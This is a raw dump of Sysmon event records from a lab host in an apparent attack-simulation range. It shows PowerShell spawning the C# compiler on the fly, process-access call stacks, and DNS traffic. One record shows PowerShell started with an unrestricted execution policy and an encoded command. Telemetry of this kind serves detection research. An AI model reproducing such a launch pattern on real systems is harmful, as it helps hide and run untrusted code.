11:59:57.903{266CAFBE-643D-6064-CB02-00000000AD01}38284436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Fram
ework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.908{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC5A9.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC2D44CB7CC3432D8BD42593E465E72.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ay2yhusm.cmdline" 354300x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.547{266CAFBE-62ED-6064-2900-00000000AD01}2752C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local53186-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.547{266CAFBE-62ED-6064-2900-00000000AD01}2752C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62007- 354300x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.547{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62007-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.747{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-643C-6064-C902-00000000AD01}38844988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d8ed2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d894a|UNKNOWN(00007FF893A5BB0F) 154100x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.711{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET 
FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ay2yhusm.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 11241100x8000000000000000291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.700{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.cmdline2021-03-31 11:59:57.700 11241100x8000000000000000290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 11:59:57.700{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ay2yhusm.dll2021-03-31 11:59:57.700 10341000x8000000000000000289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.262{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:57.262{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.262{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.950{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.950{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:58.919{266CAFBE-643E-6064-D102-00000000AD01}1604\PSHost.132616655988627367.1604.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.919{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_c5cvayfm.aj2.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.919{266CAFBE-643E-6064-D102-00000000AD01}1604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v4hb2jul.yfn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.903{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v4hb2jul.yfn.ps12021-03-31 11:59:58.903 10341000x8000000000000000410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.888{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
